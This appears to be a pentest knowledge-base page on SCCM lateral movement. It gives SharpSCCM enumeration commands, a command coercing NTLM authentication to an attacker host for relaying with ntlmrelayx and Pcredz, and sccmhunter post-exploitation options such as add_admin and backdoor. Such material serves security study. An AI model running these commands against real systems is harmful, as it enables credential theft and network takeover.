Since the main goal of SCCM is to deploy applications and services on the managed assets of the Active Directory, it is also a pretty good candidate to move latteraly on the network. With administrative rights on the primary site server, this can be done by deploying applications and scripts on the targets or coercing clients' authentication.

Additionnaly, SCCM permits to enumerate many data on the ressources. Among all the services offered by SCCM to the administrator, there is one named CMPivot. This service, located on the MP server, can enumerate all the resources of a computer or computer collection (installed software, local administrators, hardware specification, etc.), and perform administrative tasks on them. It uses a HTTP REST API, named AdminService, provided by the SMS Provider server.

Finally, as indicated by Chris Thompson in his article SCCM Hierarchy Takeover, by default, when a new user is promoted to any SCCM administrative role on a primary site server (for example, Full Administrator), the role is automatically propagated to the other SCCM site in the hierarchy by the CAS.

This means that there is no security boundary between SCCM sites in a same hierarchy, and being able to takeover one SCCM site implicates to takeover all the others.


Admin & Special Account Enumeration

This step requires administrative privileges over the SCCM Management Point (MP) in order to query the MP's WMI database.

Admin Users

SharpSCCM.exe get class-instances SMS_ADMIN

Special Accounts

SharpSCCM.exe get class-instances SMS_SCI_Reserved

Applications and scripts deployment


Step 1: Confirm Access permissions

SharpSCCM.exe get class-instances SMS_Admin -p CategoryNames -p CollectionNames -p LogonName -p RoleNames

Step 2: Find target device

# Search for device of user "Frank.Zapper"
SharpSCCM.exe get primary-users -u Frank.Zapper

# List all active SCCM devices where the SCCM client is installed 
### CAUTION: This could be huge
SharpSCCM.exe get devices -w "Active=1 and Client=1"

Step 3: Deploy Application to target device

In this final step you can chose to either create an actual application to deploy to the target machine or just trigger an install from a remote UNC path in order to capture and relay an incoming NTLM authentication. Note the following:

  • Coercing an authentication might be stealthier (and requires less cleanup) than installing an application

  • To capture and relay NTLM credentials, the target device must support NTLM (very likely).

  • The neat part: The Authentication can be coerced using the primary user account of the device OR the device computer account (you can choose)

# Prep capturing server
## ntlmrelayx targeting -smb2support -socks -ts -ip -t

# Also keep Pcredz running, just in case
Pcredz -i enp0s8 -t
# Run the attack
SharpSCCM.exe exec -rid <TargetResourceID> -r <AttackerHost>

Note that the incoming authentication requsts might take a while (couple minutes) to roll in...

AdminService API

It appears that, with SCCM administrative rights, it is possible to directly interact with the AdminService API, without using CMPivot, for post SCCM exploitation purpose.

From UNIX-like systems, sccmhunter (Python) can be used for this purpose. admin -u "$USER" -p "$PASSWORD" -ip "site_server_IP"

Then, the help command can be typed in the opened shell to view all the CMPivot commands handled by sccmhunter.

() C:\ >> help

Documented commands (use 'help -v' for verbose/'help <topic>' for details):

Database Commands
get_collection  get_device  get_lastlogon  get_puser  get_user

Interface Commands
exit  interact

PostEx Commands
add_admin  backdoor  backup  delete_admin  restore  script

Situational Awareness Commands
administrators  console_users  ipconfig   osinfo    sessions
cat             disk           list_disk  ps        shares  
cd              environment    ls         services  software

SCCM Hierarchy takeover

There is nothing to do. Just promote a user to any SCCM administrative role on a primary site server (for example, Full Administrator), and the role will be automatically propagated to the other SCCM site in the hierarchy by the CAS.


Last updated